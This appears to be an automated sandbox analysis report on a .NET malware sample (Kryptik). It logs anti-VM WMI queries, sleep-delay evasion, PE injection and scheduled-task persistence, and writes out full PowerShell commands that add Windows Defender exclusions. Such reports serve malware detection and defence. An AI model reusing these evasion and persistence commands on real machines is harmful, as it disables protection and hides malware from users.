Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 2420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 84C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 6DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 94C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: A4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 8890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 9890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 9A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: AA80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Memory allocated: 2D20000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7015	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 392	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7303	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 644	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep count: 7015 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep count: 392 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe TID: 8000	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Thread delayed: delay time: 922337203685477

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1768193613.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2942526766.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllureu
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1775633710.0000000007155000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
Source: eFzAvsOm.exe, 0000000D.00000002.2941373442.00000000010F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Memory written: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp"
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
